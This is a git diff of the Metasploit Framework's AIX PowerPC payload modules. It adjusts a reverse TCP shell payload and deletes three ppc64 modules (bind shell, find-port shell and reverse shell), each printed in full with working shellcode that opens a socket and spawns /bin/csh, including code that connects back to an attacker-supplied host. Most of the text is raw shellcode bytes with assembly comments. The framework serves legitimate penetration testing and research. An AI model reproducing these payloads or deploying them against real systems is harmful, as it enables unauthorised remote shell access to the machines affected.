@@ -88,7 +54,7 @@ module Metasploit3 "\x3b\xde\xfe\x25" +# cal r30,-475(r30) # "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x20" +# bctr # - "\xff\x02\x04\xd2" +# .long 0xff0204d2 # + "\xff\x02\x11\x5c" +# .long 0xff02115c # "\x7f\x00\x00\x01" +# .long 0x7f000001 # "\x4c\xc6\x33\x42" +# crorc 6,6,6 # "\x44\xff\xff\x02" +# svca 0 # @@ -96,24 +62,24 @@ module Metasploit3 "\x3b\xa0\x01\xff" +# lil r29,511 # "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + + @cal_socket + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x7c\x1b\x78" +# mr r28,r3 # "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # "\x38\x9e\xff\xf8" +# cal r4,-8(r30) # - cal_connect + + @cal_connect + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x3b\x7d\xfe\x03" +# cal r27,-509(r29) # "\x7f\x63\xdb\x78" +# mr r3,r27 # - cal_close + + @cal_close + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7f\x65\xdb\x78" +# mr r5,r27 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_kfcntl + + @cal_kfcntl + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x37\x7b\xff\xff" +# ai. r27,r27,-1 # @@ -127,7 +93,7 @@ module Metasploit3 "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # "\x94\x61\xff\xfc" +# stu r3,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + + @cal_execve + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x20" +# bctr # "/bin/csh" diff --git a/modules/payloads/singles/aix/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc64/shell_bind_tcp.rb deleted file mode 100644 index adc2def56a..0000000000 --- a/modules/payloads/singles/aix/ppc64/shell_bind_tcp.rb +++ /dev/null 
@@ -1,129 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' -require 'msf/core/handler/bind_tcp' -require 'msf/base/sessions/command_shell' - - -module Metasploit3 - - include Msf::Payload::Single - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'AIX Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', - 'Description' => 'Listen for a connection and spawn a command shell', - 'Author' => 'Ramon de Carvalho Valle ', - 'License' => MSF_LICENSE, - 'Platform' => 'aix', - 'Arch' => ARCH_PPC64, - 'Handler' => Msf::Handler::BindTcp, - 'Session' => Msf::Sessions::CommandShell, - 'Payload' => - { - 'Offsets' => - { - 'LPORT' => [ 77, 'n' ], - }, - } - )) - - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) - end - - def generate - case datastore['AIXLEVEL'] - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_bind = "\x38\x5d\xfe\x8d" # cal r2,-371(r29) # - cal_listen = "\x38\x5d\xfe\x8c" # cal r2,-372(r29) # - cal_accept = "\x38\x5d\xfe\x8b" # cal r2,-373(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end - - payload = - "\x7f\xff\xfa\x79" +# xor. 
r31,r31,r31 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x01\xff" +# lil r29,511 # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # - "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7c\x1b\x78" +# mr r28,r3 # - "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # - "\x3f\x60\xff\x02" +# liu r27,-254 # - "\x63\x7b\x04\xd2" +# oril r27,r27,1234 # - "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # - "\x97\x61\xff\xfc" +# stu r27,-4(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_bind + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_listen + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_accept + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7a\x1b\x78" +# mr r26,r3 # - "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # - "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x25\xcb\x78" +# mr r5,r25 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x43\xd3\x78" +# mr r3,r26 # - cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x39\xff\xff" +# ai. r25,r25,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. 
r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) # - "\xf8\x61\xff\xf9" +# stdu r3,-8(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "/bin/csh" - - end - -end diff --git a/modules/payloads/singles/aix/ppc64/shell_find_port.rb b/modules/payloads/singles/aix/ppc64/shell_find_port.rb deleted file mode 100644 index fc44ddaecf..0000000000 --- a/modules/payloads/singles/aix/ppc64/shell_find_port.rb +++ /dev/null 
@@ -1,115 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' -require 'msf/core/handler/find_port' -require 'msf/base/sessions/command_shell' - - -module Metasploit3 - - include Msf::Payload::Single - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'AIX Command Shell, Find Port Inline', - 'Version' => '$Revision$', - 'Description' => 'Spawn a shell on an established connection', - 'Author' => 'Ramon de Carvalho Valle ', - 'License' => MSF_LICENSE, - 'Platform' => 'aix', - 'Arch' => ARCH_PPC64, - 'Handler' => Msf::Handler::FindPort, - 'Session' => Msf::Sessions::CommandShell, - 'Payload' => - { - 'Offsets' => - { - 'CPORT' => [ 106, 'n' ], - }, - } - )) - - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) - end - - def generate - case datastore['AIXLEVEL'] - when '5.3.0' - cal_getpeername = "\x38\x5d\xfe\x7b" # cal r2,-389(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end - - payload = - "\x7f\xff\xfa\x79" +# xor. 
r31,r31,r31 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x01\xff" +# lil r29,511 # - "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # - "\x7c\x3c\x0b\x78" +# mr r28,r1 # - "\x3b\x7d\xfe\x2d" +# cal r27,-467(r29) # - "\x97\x61\xff\xfc" +# stu r27,-4(r1) # - "\x7c\x3b\x0b\x78" +# mr r27,r1 # - "\x3b\xff\x01\xff" +# cal r31,511(r31) # - "\x3b\xff\xfe\x02" +# cal r31,-510(r31) # - "\x7f\x65\xdb\x78" +# mr r5,r27 # - "\x7f\x84\xe3\x78" +# mr r4,r28 # - "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_getpeername + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x3b\x5c\x01\xff" +# cal r26,511(r28) # - "\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) # - "\x28\x1a\x04\xd2" +# cmpli 0,r26,1234 # - "\x40\x82\xff\xd4" +# bne # - "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # - "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x25\xcb\x78" +# mr r5,r25 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x39\xff\xff" +# ai. r25,r25,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) # - "\xf8\x61\xff\xf9" +# stdu r3,-8(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "/bin/csh" - - end - -end 
diff --git a/modules/payloads/singles/aix/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc64/shell_reverse_tcp.rb
deleted file mode 100644
index b36f77e55a..0000000000
--- a/modules/payloads/singles/aix/ppc64/shell_reverse_tcp.rb
+++ /dev/null
@@ -1,113 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' -require 'msf/core/handler/reverse_tcp' -require 'msf/base/sessions/command_shell' - - -module Metasploit3 - - include Msf::Payload::Single - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'AIX Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', - 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'Ramon de Carvalho Valle ', - 'License' => MSF_LICENSE, - 'Platform' => 'aix', - 'Arch' => ARCH_PPC64, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShell, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 32, 'ADDR' ], - 'LPORT' => [ 30, 'n' ], - }, - } - )) - - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) - end - - def generate - case datastore['AIXLEVEL'] - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_connect = "\x38\x5d\xfe\x8f" # cal r2,-369(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end - - payload = - "\x7c\xa5\x2a\x79" +# xor. 
r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x25" +# cal r30,-475(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\xff\x02\x04\xd2" +# .long 0xff0204d2 # - "\x7f\x00\x00\x01" +# .long 0x7f000001 # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x01\xff" +# lil r29,511 # - "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # - "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7c\x1b\x78" +# mr r28,r3 # - "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # - "\x38\x9e\xff\xf8" +# cal r4,-8(r30) # - cal_connect + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x3b\x7d\xfe\x03" +# cal r27,-509(r29) # - "\x7f\x63\xdb\x78" +# mr r3,r27 # - cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x65\xdb\x78" +# mr r5,r27 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x7b\xff\xff" +# ai. r27,r27,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) # - "\xf8\x61\xff\xf9" +# stdu r3,-8(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "/bin/csh" - - end - -end